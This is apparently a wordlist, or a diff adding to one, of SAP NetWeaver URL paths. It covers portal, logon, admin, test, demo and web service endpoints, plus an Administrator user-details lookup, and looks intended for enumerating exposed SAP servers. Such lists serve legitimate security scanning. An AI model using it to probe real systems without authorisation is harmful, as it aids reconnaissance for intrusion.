+irj/servlet
+irj/servlet/prt
+irj/servlet/prt/portal
+irj/servlet/prt/portal/
+irj/servlet/prt/portal/prtroot
+irj/servlet/prt/portal/prtroot/PortalAnywhere.Go
+irj/servlet/prt/portal/prtroot/com.sap.km.cm.basicsearch
+irj/servlet/prt/portal/prtroot/com.sap.km.cm.docs -> webdav
+irj/servlet/prt/portal/prtroot/com.sap.km.cm.highlightedcontent
+irj/servlet/prt/portal/prtroot/com.sap.km.cm.navigation
+irj/servlet/prt/portal/prtroot/com.sap.km.cm.uidetails
+irj/servlet/prt/portal/prtroot/com.sap.km.home_ws
+irj/servlet/prt/portal/prtroot/com.sap.netweaver.kmc.people.PeopleDetails?Uri=/ume/users/USER.PRIVATE_DATASOURCE.un%253AAdministrator.usr
+irj/servlet/prt/portal/prtroot/com.sap.portal.dsm.terminator
+irj/servlet/prt/portal/prtroot/com.sap.portal.epcf.loader.wdscriptblockprovider
+irj/servlet/prt/portal/prtroot/pcd!(*)
+irj/servlet/prt/portal/prttarget/uidpwlogon/prteventname/performchangepassword
+lcrabapapi
+logon
+logon/index.jsp
+logon/logonServlet
+logon/logonServlet?redirectURL=%2FVC%2Fdefault.jsp
+logon/logonServlet?redirectURL=%2Fuseradmin%2FuserAdminServlet
+main.html
+mbeanreg
+meSync
+meSync/HttpGRMGTest.html
+mmr
+mmr/
+modeller/
+modeller/index.html
+monitoring
+monitoringProvierRoot
+nwa
+performanceProvierRoot
+pmi
+portal
+portalapps
+rep/build_info.html
+rep/build_info.jsp
+rep/start/index.jsp
+run/build_info.html
+run/build_info.jsp
+rwb/version.html
+saml
+samlssodemo_dest
+samlssodemo_source
+sap
+sap/
+sap/IStest
+sap/admin
+sap/admin/default.html
+sap/admin/index.html
+sap/ap
+sap/bc
+sap/bc/
+sap/bc/BEx
+sap/bc/FormToRfc
+sap/bc/FormToRfc/soap
+sap/bc/IDoc_XML
+sap/bc/MIDSD
+sap/bc/MJC
+sap/bc/MJC/
+sap/bc/MJC/mi_host
+sap/bc/MJC/mi_mds
+sap/bc/MJC/mi_service
+sap/bc/MJC/mi_services
+sap/bc/MY_NEW_SERV99
+sap/bc/Mi_host_http
+sap/bc/Mime
+sap/bc/bsp
+sap/bc/bsp/
+sap/bc/bsp/esh_os_service/favicon.gif
+sap/bc/bsp/sap
+sap/bc/bsp/sap/
+sap/bc/bsp/sap/SXSLT_DEMO
+sap/bc/bsp/sap/absenceform_new
+sap/bc/bsp/sap/alertinbox
+sap/bc/bsp/sap/alertinboxwap
+sap/bc/bsp/sap/bexlogon
+sap/bc/bsp/sap/bkbtest
+sap/bc/bsp/sap/bkbtest_sch
+sap/bc/bsp/sap/brf_export_xml
+sap/bc/bsp/sap/brf_info
+sap/bc/bsp/sap/bsp_dlc_frcmp
+sap/bc/bsp/sap/bsp_model
+sap/bc/bsp/sap/bsp_veri
+sap/bc/bsp/sap/bsp_verificatio
+sap/bc/bsp/sap/bsp_vhelp
+sap/bc/bsp/sap/bsp_wd_base
+sap/bc/bsp/sap/bsp_wd_comp_spl
+sap/bc/bsp/sap/bsp_wd_compbase
+sap/bc/bsp/sap/bsp_wd_ddlb_spl
+sap/bc/bsp/sap/bsp_wd_tree_spl
+sap/bc/bsp/sap/bspwd_basics
+sap/bc/bsp/sap/bspwd_cmp_embed
+sap/bc/bsp/sap/bspwd_simple
+sap/bc/bsp/sap/btf_ext_demo
+sap/bc/bsp/sap/ccms_mc
+sap/bc/bsp/sap/certmap
+sap/bc/bsp/sap/certreq
+sap/bc/bsp/sap/crm_bm
+sap/bc/bsp/sap/crm_bsp_bab_dis
+sap/bc/bsp/sap/crm_bsp_bab_dss
+sap/bc/bsp/sap/crm_bsp_bab_exi
+sap/bc/bsp/sap/crm_bsp_bab_fra
+sap/bc/bsp/sap/crm_bsp_bab_pan
+sap/bc/bsp/sap/crm_bsp_f1_help
+sap/bc/bsp/sap/crm_bsp_f4_help
+sap/bc/bsp/sap/crm_bsp_face
+sap/bc/bsp/sap/crm_bsp_frame
+sap/bc/bsp/sap/crm_bsp_listper
+sap/bc/bsp/sap/crm_bsp_lst_prt
+sap/bc/bsp/sap/crm_bsp_xbab_fr
+sap/bc/bsp/sap/crm_bsp_xbab_pa
+sap/bc/bsp/sap/crm_ei_cmp_admn
+sap/bc/bsp/sap/crm_ic_check
+sap/bc/bsp/sap/crm_ic_ise
+sap/bc/bsp/sap/crm_ic_ise/editor
+sap/bc/bsp/sap/crm_ic_mcm
+sap/bc/bsp/sap/crm_ic_preview
+sap/bc/bsp/sap/crm_ic_xmledit
+sap/bc/bsp/sap/crm_ici_tst_cat
+sap/bc/bsp/sap/crm_ml_preview
+sap/bc/bsp/sap/crm_preview
+sap/bc/bsp/sap/crm_prt_url_dis
+sap/bc/bsp/sap/crm_thtmlb_util
+sap/bc/bsp/sap/crm_ui_frame
+sap/bc/bsp/sap/crm_ui_start
+sap/bc/bsp/sap/crm_xml_test
+sap/bc/bsp/sap/crmcmp_bpident/
+sap/bc/bsp/sap/crmcmp_brfcase
+sap/bc/bsp/sap/crmcmp_hdr
+sap/bc/bsp/sap/crmcmp_hdr_std
+sap/bc/bsp/sap/crmcmp_ic_frame
+sap/bc/bsp/sap/decode_url
+sap/bc/bsp/sap/ecteched
+sap/bc/bsp/sap/esh_sap_link
+sap/bc/bsp/sap/esh_sapgui_exe
+sap/bc/bsp/sap/frontend_print
+sap/bc/bsp/sap/graph_bsp_test
+sap/bc/bsp/sap/graph_bsp_test/Mimes
+sap/bc/bsp/sap/graph_tut_chart
+sap/bc/bsp/sap/graph_tut_chart/Mimes
+sap/bc/bsp/sap/graph_tut_jnet
+sap/bc/bsp/sap/graph_tut_jnet/Mimes
+sap/bc/bsp/sap/graph_tutorials
+sap/bc/bsp/sap/graph_tutorials/mimes
+sap/bc/bsp/sap/gsbirp
+sap/bc/bsp/sap/hap_document
+sap/bc/bsp/sap/hap_q_profile
+sap/bc/bsp/sap/hr_expert
+sap/bc/bsp/sap/htmlb_samples
+sap/bc/bsp/sap/ic_base
+sap/bc/bsp/sap/ic_frw_notify
+sap/bc/bsp/sap/iccmp_bp_cnfirm
+sap/bc/bsp/sap/iccmp_hdr_cntnr
+sap/bc/bsp/sap/iccmp_hdr_cntnt
+sap/bc/bsp/sap/iccmp_header
+sap/bc/bsp/sap/iccmp_ssc_ll/
+sap/bc/bsp/sap/icf
+sap/bc/bsp/sap/icf_notify_poll
+sap/bc/bsp/sap/icfrecorder
+sap/bc/bsp/sap/icm
+sap/bc/bsp/sap/it00
+sap/bc/bsp/sap/it01
+sap/bc/bsp/sap/it02
+sap/bc/bsp/sap/it03
+sap/bc/bsp/sap/it04
+sap/bc/bsp/sap/it05
+sap/bc/bsp/sap/itsm
+sap/bc/bsp/sap/me_fw_install
+sap/bc/bsp/sap/merep_app_meta
+sap/bc/bsp/sap/ppm
+sap/bc/bsp/sap/ppm_detail
+sap/bc/bsp/sap/public
+sap/bc/bsp/sap/public/
+sap/bc/bsp/sap/public/FormGraphics
+sap/bc/bsp/sap/public/bc
+sap/bc/bsp/sap/public/graphics
+sap/bc/bsp/sap/rmpspb_case
+sap/bc/bsp/sap/rmpspb_casenote
+sap/bc/bsp/sap/rsrthemes_iview
+sap/bc/bsp/sap/sam_demo
+sap/bc/bsp/sap/sam_notifying
+sap/bc/bsp/sap/sam_sess_queue
+sap/bc/bsp/sap/sapsign
+sap/bc/bsp/sap/sapterm
+sap/bc/bsp/sap/sbsp_dal_demo
+sap/bc/bsp/sap/sbspext_bsp
+sap/bc/bsp/sap/sbspext_htmlb
+sap/bc/bsp/sap/sbspext_phtmlb
+sap/bc/bsp/sap/sbspext_table
+sap/bc/bsp/sap/sbspext_xhtmlb
+sap/bc/bsp/sap/scpbspconvertuc
+sap/bc/bsp/sap/sem_upwb
+sap/bc/bsp/sap/sf_webform_01
+sap/bc/bsp/sap/sf_webform_02
+sap/bc/bsp/sap/sf_webform_03
+sap/bc/bsp/sap/sf_webform_04
+sap/bc/bsp/sap/sfint_demo01
+sap/bc/bsp/sap/sfint_demo02
+sap/bc/bsp/sap/sfint_demo03
+sap/bc/bsp/sap/sfint_demo04
+sap/bc/bsp/sap/sicf_login_test
+sap/bc/bsp/sap/sicf_login_test/
+sap/bc/bsp/sap/sicf_login_test/test
+sap/bc/bsp/sap/sicf_login_test/testNoRedirect
+sap/bc/bsp/sap/smart_forms
+sap/bc/bsp/sap/spi_admin
+sap/bc/bsp/sap/spi_monitor
+sap/bc/bsp/sap/spi_procmonitor
+sap/bc/bsp/sap/srm_demo_bspext
+sap/bc/bsp/sap/srm_demo_note
+sap/bc/bsp/sap/srm_demo_record
+sap/bc/bsp/sap/srm_doc_test
+sap/bc/bsp/sap/srm_gensp_query
+sap/bc/bsp/sap/srm_note
+sap/bc/bsp/sap/srm_prop
+sap/bc/bsp/sap/srm_record
+sap/bc/bsp/sap/srmclfrm
+sap/bc/bsp/sap/srmps_browser
+sap/bc/bsp/sap/srmps_favorites
+sap/bc/bsp/sap/srmps_history
+sap/bc/bsp/sap/srmps_metadata
+sap/bc/bsp/sap/srmps_search
+sap/bc/bsp/sap/srt_browser
+sap/bc/bsp/sap/ssf_techinf
+sap/bc/bsp/sap/ssfdemodigsig
+sap/bc/bsp/sap/ssfdemodigsig2
+sap/bc/bsp/sap/swfmod_portal
+sap/bc/bsp/sap/swh_demo_calc
+sap/bc/bsp/sap/swn_config
+sap/bc/bsp/sap/swn_message1
+sap/bc/bsp/sap/swn_wiexecute
+sap/bc/bsp/sap/swxtraagent
+sap/bc/bsp/sap/swxtrareq
+sap/bc/bsp/sap/sxidemo_agcy_ui
+sap/bc/bsp/sap/sxms_alertrules
+sap/bc/bsp/sap/sxslt_training
+sap/bc/bsp/sap/system
+sap/bc/bsp/sap/system640
+sap/bc/bsp/sap/system_priv_01
+sap/bc/bsp/sap/system_priv_02
+sap/bc/bsp/sap/system_priv_03
+sap/bc/bsp/sap/system_private
+sap/bc/bsp/sap/system_public
+sap/bc/bsp/sap/system_test
+sap/bc/bsp/sap/t_sam_demo
+sap/bc/bsp/sap/thtmlb_scripts
+sap/bc/bsp/sap/thtmlb_styles
+sap/bc/bsp/sap/tunguska
+sap/bc/bsp/sap/tunguska_detail
+sap/bc/bsp/sap/tutorial_1
+sap/bc/bsp/sap/tutorial_2
+sap/bc/bsp/sap/tutorial_2htmlb
+sap/bc/bsp/sap/tutorial_3
+sap/bc/bsp/sap/tutorial_3_mvc
+sap/bc/bsp/sap/tutorial_4
+sap/bc/bsp/sap/tutorial_4_mvc
+sap/bc/bsp/sap/tutorial_cache
+sap/bc/bsp/sap/uddiclientfind
+sap/bc/bsp/sap/uddiclpublish
+sap/bc/bsp/sap/uicmp_ltx
+sap/bc/bsp/sap/upwb_sem
+sap/bc/bsp/sap/upwb_test_otr
+sap/bc/bsp/sap/upx_exec
+sap/bc/bsp/sap/upx_exec2
+sap/bc/bsp/sap/uws_form_servic
+sap/bc/bsp/sap/wap_push
+sap/bc/bsp/sap/webdynprodemos
+sap/bc/bsp/sap/wp_sess_test2
+sap/bc/bsp/sap/wscb
+sap/bc/bsp/sap/wsi_oci_bsp
+sap/bc/bsp/sap/wsi_oci_bsp_mvc
+sap/bc/bsp/sap/xi_pf_perf_moni
+sap/bc/bsp/sap/xi_pf_test
+sap/bc/bsp/sap/xmb_bsp_log
+sap/bc/bsp/scmb
+sap/bc/bsp/scmb/df_web2
+sap/bc/bsp_dev
+sap/bc/bw_test
+sap/bc/cachetest
+sap/bc/ccms
+sap/bc/ccms/
+sap/bc/ccms//Specto
+sap/bc/ccms/MarketSet
+sap/bc/ccms/monitoring
+sap/bc/ccms/monitoring/GRMG_APP
+sap/bc/ccms/monitoringCCMS_XML
+sap/bc/ce_url
+sap/bc/cimom
+sap/bc/cms
+sap/bc/contentserver
+sap/bc/crm_bsp_dl
+sap/bc/dal
+sap/bc/dal/demoB
+sap/bc/daldemoA
+sap/bc/doc
+sap/bc/doc/
+sap/bc/doc/browser
+sap/bc/doc/mast
+sap/bc/doc/meta
+sap/bc/doc/metadata
+sap/bc/doc/tmpl
+sap/bc/doc/tran
+sap/bc/docu
+sap/bc/dr
+sap/bc/ecatt
+sap/bc/ecatt/
+sap/bc/ecatt/ecatt_recorder
+sap/bc/ecatt/ecattping
+sap/bc/ecatt/log_provider
+sap/bc/echo
+sap/bc/echo/
+sap/bc/echo/logon
+sap/bc/echo/logon_base64
+sap/bc/echo/redirect
+sap/bc/error
+sap/bc/error/
+sap/bc/error/list
+sap/bc/error/template
+sap/bc/error/webgui
+sap/bc/esf
+sap/bc/formabsdelete
+sap/bc/fp
+sap/bc/fpads
+sap/bc/generate
+sap/bc/generate/poll
+sap/bc/graphics
+sap/bc/graphics/net
+sap/bc/gui
+sap/bc/gui/its
+sap/bc/gui/sap
+sap/bc/gui/sap/its/
+sap/bc/gui/sap/its/BWSP
+sap/bc/gui/sap/its/BWWF_WI_DECI
+sap/bc/gui/sap/its/BWWI_EXECUTE
+sap/bc/gui/sap/its/CCMS_APPSRVLIS
+sap/bc/gui/sap/its/CCMS_DBBUFARCH
+sap/bc/gui/sap/its/CERTMAP
+sap/bc/gui/sap/its/CERTREQ
+sap/bc/gui/sap/its/CRM_CIC_RABOX
+sap/bc/gui/sap/its/GRM_WRAPPER
+sap/bc/gui/sap/its/MININOTES
+sap/bc/gui/sap/its/MY_PROFILEMATC
+sap/bc/gui/sap/its/RSAU_STATUS
+sap/bc/gui/sap/its/SAPSIGN
+sap/bc/gui/sap/its/SAP_GENERATE
+sap/bc/gui/sap/its/SSFIDEMODIGSIG
+sap/bc/gui/sap/its/STATUSPANEL
+sap/bc/gui/sap/its/STERM_ITS
+sap/bc/gui/sap/its/TEST_XMLPARSER
+sap/bc/gui/sap/its/WSI_OCI_ITS
+sap/bc/gui/sap/its/XML_DTD_01
+sap/bc/gui/sap/its/alinkviewer
+sap/bc/gui/sap/its/bwca
+sap/bc/gui/sap/its/designs
+sap/bc/gui/sap/its/my_qualis
+sap/bc/gui/sap/its/my_requirement
+sap/bc/gui/sap/its/sample
+sap/bc/gui/sap/its/sample/
+sap/bc/gui/sap/its/sample/IAC_CALENDAR
+sap/bc/gui/sap/its/sample/IAC_FLIGHT
+sap/bc/gui/sap/its/sample/IAC_INPUT
+sap/bc/gui/sap/its/sample/IAC_SE38
+sap/bc/gui/sap/its/sample/IAC_TABLE
+sap/bc/gui/sap/its/sample/IAC_TEXTEDIT
+sap/bc/gui/sap/its/sample/IAC_TOOLBAR
+sap/bc/gui/sap/its/sample/IAC_TREE1
+sap/bc/gui/sap/its/sample/IAC_TREE2
+sap/bc/gui/sap/its/sample/iAC_HTML
+sap/bc/gui/sap/its/test
+sap/bc/gui/sap/its/test/
+sap/bc/gui/sap/its/test/it
+sap/bc/gui/sap/its/test/it/
+sap/bc/gui/sap/its/test/it/IT12
+sap/bc/gui/sap/its/test/it/IT13
+sap/bc/gui/sap/its/test/it/ITRBX
+sap/bc/gui/sap/its/test/it/it00
+sap/bc/gui/sap/its/test/it/it19
+sap/bc/gui/sap/its/test/webgui_end
+sap/bc/gui/sap/its/test/webgui_tj
+sap/bc/gui/sap/its/test/webgui_txend
+sap/bc/gui/sap/its/webgui
+sap/bc/gui/sap/its/webgui/!
+sap/bc/icf
+sap/bc/icf/
+sap/bc/icf/demo
+sap/bc/icf/demo/example_1
+sap/bc/icf/recorder
+sap/bc/icf/verification
+sap/bc/icman
+sap/bc/icman/test01
+sap/bc/idoc_xml
+sap/bc/igs_data
+sap/bc/kw
+sap/bc/kw/
+sap/bc/kw/K/Link
+sap/bc/kw/fs
+sap/bc/kw/mime
+sap/bc/kw/skwr
+sap/bc/mlt
+sap/bc/mlt/
+sap/bc/mlt//vb
+sap/bc/mlt/slim
+sap/bc/mlt/slim/
+sap/bc/mlt/slim//lang_plus
+sap/bc/mlt/slim/branching
+sap/bc/mlt/slim/pcx
+sap/bc/mlt/slim/pcx_plus
+sap/bc/mlt/test
+sap/bc/mlt/tmware
+sap/bc/mlt/trados
+sap/bc/notify
+sap/bc/notify/polling
+sap/bc/ping
+sap/bc/print
+sap/bc/rehm
+sap/bc/report
+sap/bc/sapits_mimes
+sap/bc/smart_forms
+sap/bc/soap
+sap/bc/soap/
+sap/bc/soap/doc
+sap/bc/soap/ici
+sap/bc/soap/ici_ssl
+sap/bc/soap/rfc
+sap/bc/soap/wsdl
+sap/bc/soap/wsdl11
+sap/bc/soap/wsdlservices
+sap/bc/spi_gate
+sap/bc/srm
+sap/bc/srm/rcm_webdav
+sap/bc/srm/rcm_webdav/
+sap/bc/srm/rcm_webdav/s_area_cmg
+sap/bc/srm/rcm_webdav/s_area_rms
+sap/bc/srt
+sap/bc/srt/
+sap/bc/srt/IDoc
+sap/bc/srt/esf
+sap/bc/srt/rfc
+sap/bc/srt/rfc/
+sap/bc/srt/rfc/OSP
+sap/bc/srt/rfc/sap
+sap/bc/srt/sap/
+sap/bc/srt/sap/Detailed_flight_info_get
+sap/bc/srt/sap/ER_REGISTRY_SUPPORT_SERVICE
+sap/bc/srt/sap/II_TEST_IN_SYNC
+sap/bc/srt/sap/ME_RT_DSD_WS_64
+sap/bc/srt/sap/QUERY_VIEW_DATA
+sap/bc/srt/sap/RSDAW_NEARLINE_SERVER
+sap/bc/srt/sap/RSOBJSALTERNODEREFS
+sap/bc/srt/sap/RSOBJS_ALTER_NODE_REFS
+sap/bc/srt/sap/RSOBJS_CHECK
+sap/bc/srt/sap/RSOBJS_DELETE
+sap/bc/srt/sap/RSOBJS_GET_NODES
+sap/bc/srt/sap/RSOBJS_INIT
+sap/bc/srt/sap/RSOBJS_WHERE_USED_LIST
+sap/bc/srt/sap/RSPO_SXOMS_DEFINE_PRINTER
+sap/bc/srt/sap/RSPO_SXOMS_DELETE_PRINTER
+sap/bc/srt/sap/RSPO_SXOMS_GET_DEVICE_TYPES
+sap/bc/srt/sap/RSPO_SXOMS_GET_TRAY_INFO
+sap/bc/srt/sap/RSPO_SXOMS_PUSH_ROMS_LOMS
+sap/bc/srt/sap/RSPO_SXOMS_UPDATE_PRINTER
+sap/bc/srt/sap/SAP_RPE_SEQUENCE
+sap/bc/srt/sap/SBIZC_AUTHOR
+sap/bc/srt/sap/SBIZC_AUTHORING
+sap/bc/srt/sap/SBIZC_DETAIL
+sap/bc/srt/sap/SBIZC_TEST_AUTHOR_INIT
+sap/bc/srt/sap/SBIZC_WS_TEST
+sap/bc/srt/sap/SRTFT_MASS_CONFIGURATION
+sap/bc/srt/sap/SRTFT_SYSTEM_METADATA_ACCESS
+sap/bc/srt/sap/SRT_TESTS_FB_ADD_WS
+sap/bc/srt/sap/SRT_TESTS_FB_PAR_TEST01_WS
+sap/bc/srt/sap/SRT_TESTS_FB_PAR_TEST02_WS
+sap/bc/srt/sap/SRT_TESTS_FB_PAR_TEST03_WS
+sap/bc/srt/sap/SRT_TESTS_FB_SUM_WS
+sap/bc/srt/sap/SXIDAL_FLIGHTSEATAVAIL_CHECK
+sap/bc/srt/sap/SYNCCALLSECURITYHIGHNOAUTOGEN
+sap/bc/srt/sap/SYNCCALLSECURITYLOWAUTOGEN
+sap/bc/srt/sap/TEST_WEBSERVICE_WRITE
+sap/bc/srt/sap/WDYBUILDINBOX
+sap/bc/srt/sap/WDYGETDC
+sap/bc/srt/sap/WDYGETTF
+sap/bc/srt/sap/WDYSETDC
+sap/bc/srt/sap/WDYUPDATETF
+sap/bc/srt/sap/WS_ORDER_BE_IN
+sap/bc/srt/sap/ob_wsd_test02
+sap/bc/srt/sap/xmla
+sap/bc/srt/wsil
+sap/bc/srt/xip
+sap/bc/srt/xip/sap
+sap/bc/testzone
+sap/bc/testzone/
+sap/bc/testzone/depot_select
+sap/bc/testzone/result_rep
+sap/bc/verification/
+sap/bc/verification/itsplugin
+sap/bc/verification/stateful_ping
+sap/bc/wappush
+sap/bc/wd_trace_tool
+sap/bc/wdvd
+sap/bc/webapp
+sap/bc/webdynpro
+sap/bc/webdynpro/sap
+sap/bc/webdynpro/sap/
+sap/bc/webdynpro/sap/CCMSBI_WAST_EXTR_TESTENV
+sap/bc/webdynpro/sap/CNP_LIGHT_TEST
+sap/bc/webdynpro/sap/DBA_COCKPIT
+sap/bc/webdynpro/sap/DEMO_CONTEXT_CHANGES
+sap/bc/webdynpro/sap/DEMO_ROADMAP
+sap/bc/webdynpro/sap/DEMO_SIMPLE_MAIN
+sap/bc/webdynpro/sap/DEMO_TABLE
+sap/bc/webdynpro/sap/DEMO_TABLE_WITH_TREE_BY_KEY
+sap/bc/webdynpro/sap/DEMO_TABLE_WITH_TREE_BY_NST
+sap/bc/webdynpro/sap/DemoDynamic
+sap/bc/webdynpro/sap/DemoTree
+sap/bc/webdynpro/sap/EXAMPLE_WDABAP_3
+sap/bc/webdynpro/sap/KEY_FIGURE_MONITOR
+sap/bc/webdynpro/sap/KEY_FIGURE_TREND
+sap/bc/webdynpro/sap/MASTERMIND
+sap/bc/webdynpro/sap/OTHELLO
+sap/bc/webdynpro/sap/POWL
+sap/bc/webdynpro/sap/POWL_COLLECTOR
+sap/bc/webdynpro/sap/POWL_MASTER_QUERY
+sap/bc/webdynpro/sap/POWL_PERS_COMP
+sap/bc/webdynpro/sap/RCM_DOC_CLIENT_test
+sap/bc/webdynpro/sap/RCM_ORGANIZER
+sap/bc/webdynpro/sap/RCM_RECORD
+sap/bc/webdynpro/sap/RCM_SP
+sap/bc/webdynpro/sap/RCM_SP_URL
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_ALVFNC
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_COLORS
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_COLSCR
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_CV
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_EDIT
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_EVENTS
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_F4
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_MIG
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_PARTS
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_PROPS
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_SIMPLE
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_TOL
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_TOOLBR
+sap/bc/webdynpro/sap/SALV_WD_DEMO_TABLE_TREE
+sap/bc/webdynpro/sap/SALV_WD_TEST_DATA
+sap/bc/webdynpro/sap/SALV_WD_TEST_DATA_DOWNLOAD
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_ALVFNC
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_COLORS
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_COLSCR
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_CV
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_EDIT
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_EDIT_M
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_EVENTS
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_IN_WDW
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_PROPS
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_SELECT
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_SIMPLE
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_TOOLBR
+sap/bc/webdynpro/sap/SALV_WD_TEST_TABLE_TREE
+sap/bc/webdynpro/sap/TEST_BAD_LINK
+sap/bc/webdynpro/sap/TEST_MODIFY_VIEW
+sap/bc/webdynpro/sap/TEST_RUNTIME_REPOSITORY
+sap/bc/webdynpro/sap/TestUpload
+sap/bc/webdynpro/sap/WDK_A_SE91
+sap/bc/webdynpro/sap/WDK_SPOOL_TO_PDF
+sap/bc/webdynpro/sap/WDR_DOCU_HELPER
+sap/bc/webdynpro/sap/WDR_MESSAGE_AREA
+sap/bc/webdynpro/sap/WDR_TEST_ADOBE
+sap/bc/webdynpro/sap/WDR_TEST_DDIC_SHLP
+sap/bc/webdynpro/sap/WDR_TEST_DOCU
+sap/bc/webdynpro/sap/WDR_TEST_EVENTS
+sap/bc/webdynpro/sap/WDR_TEST_ICON_SOURCES
+sap/bc/webdynpro/sap/WDR_TEST_IT05
+sap/bc/webdynpro/sap/WDR_TEST_JNDI_PROVIDER
+sap/bc/webdynpro/sap/WDR_TEST_LAYOUTS
+sap/bc/webdynpro/sap/WDR_TEST_MODIFY_VIEW
+sap/bc/webdynpro/sap/WDR_TEST_NAVIGATION
+sap/bc/webdynpro/sap/WDR_TEST_OVS
+sap/bc/webdynpro/sap/WDR_TEST_P00001
+sap/bc/webdynpro/sap/WDR_TEST_P00002
+sap/bc/webdynpro/sap/WDR_TEST_P00003
+sap/bc/webdynpro/sap/WDR_TEST_P13N
+sap/bc/webdynpro/sap/WDR_TEST_POPUPS
+sap/bc/webdynpro/sap/WDR_TEST_POPUPS_RT
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_FIRE
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_FIRE2
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_FIRE_POP
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_REC
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_REC2
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_REC_POP
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_NAV_OBN
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_NAV_PAGE
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_NAV_TARGET
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_OBN_POPUP
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_OBN_WS
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_OBN_WS_IN
+sap/bc/webdynpro/sap/WDR_TEST_PORTAL_WORKPROTECT
+sap/bc/webdynpro/sap/WDR_TEST_RUNTIME
+sap/bc/webdynpro/sap/WDR_TEST_TABLE
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_CHILD
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_CLOSE
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_ERROR
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_LOGOFF
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_RESUME
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_SUITE
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_SUSRES_A
+sap/bc/webdynpro/sap/WDR_TEST_WINDOW_SUSRES_B
+sap/bc/webdynpro/sap/WDR_UIE_LIBRARY
+sap/bc/webdynpro/sap/apb_launchpad
+sap/bc/webdynpro/sap/apb_launchpad_nwbc
+sap/bc/webdynpro/sap/apb_lpd_light_start
+sap/bc/webdynpro/sap/apb_lpd_start_url
+sap/bc/webdynpro/sap/appl_log_trc_viewer
+sap/bc/webdynpro/sap/appl_soap_management
+sap/bc/webdynpro/sap/application_exit
+sap/bc/webdynpro/sap/ccmsbi_wast_extr_testenv
+sap/bc/webdynpro/sap/cnp_light_test
+sap/bc/webdynpro/sap/configure_application
+sap/bc/webdynpro/sap/configure_component
+sap/bc/webdynpro/sap/demo_messages
+sap/bc/webdynpro/sap/demo_messages2
+sap/bc/webdynpro/sap/demo_variable_dropdown
+sap/bc/webdynpro/sap/demo_wda_quiz
+sap/bc/webdynpro/sap/demo_wda_table
+sap/bc/webdynpro/sap/esh_adm_smoketest_ui
+sap/bc/webdynpro/sap/esh_admin_ui_component
+sap/bc/webdynpro/sap/esh_eng_modelling
+sap/bc/webdynpro/sap/esh_search_results.ui
+sap/bc/webdynpro/sap/ios_test_helloworld_ms
+sap/bc/webdynpro/sap/ios_test_helloworld_so
+sap/bc/webdynpro/sap/ios_test_simple_ms
+sap/bc/webdynpro/sap/ios_test_simple_so
+sap/bc/webdynpro/sap/its
+sap/bc/webdynpro/sap/powl_test_feeder
+sap/bc/webdynpro/sap/ptm_assign_s_ui
+sap/bc/webdynpro/sap/ptm_jf_worklist_ui
+sap/bc/webdynpro/sap/ptm_maintain_jf_ui
+sap/bc/webdynpro/sap/rcm_multistring_edit_example
+sap/bc/webdynpro/sap/rcm_poid_info_example
+sap/bc/webdynpro/sap/rcm_property_query_example
+sap/bc/webdynpro/sap/salv_wd_demo_table_dfault
+sap/bc/webdynpro/sap/salv_wd_submit
+sap/bc/webdynpro/sap/salv_wd_test_col_field
+sap/bc/webdynpro/sap/salv_wd_test_conf_caller
+sap/bc/webdynpro/sap/salv_wd_test_config1
+sap/bc/webdynpro/sap/salv_wd_test_config_api
+sap/bc/webdynpro/sap/salv_wd_test_config_api2
+sap/bc/webdynpro/sap/salv_wd_test_datatypes
+sap/bc/webdynpro/sap/salv_wd_test_dyn1
+sap/bc/webdynpro/sap/salv_wd_test_extended
+sap/bc/webdynpro/sap/salv_wd_test_file_upload
+sap/bc/webdynpro/sap/salv_wd_test_image1
+sap/bc/webdynpro/sap/salv_wd_test_modif1
+sap/bc/webdynpro/sap/salv_wd_test_no_ddic
+sap/bc/webdynpro/sap/salv_wd_test_non_portal
+sap/bc/webdynpro/sap/salv_wd_test_set_data
+sap/bc/webdynpro/sap/salv_wd_test_set_data1
+sap/bc/webdynpro/sap/salv_wd_test_simple1
+sap/bc/webdynpro/sap/salv_wd_test_table_edit2
+sap/bc/webdynpro/sap/salv_wd_test_table_f4
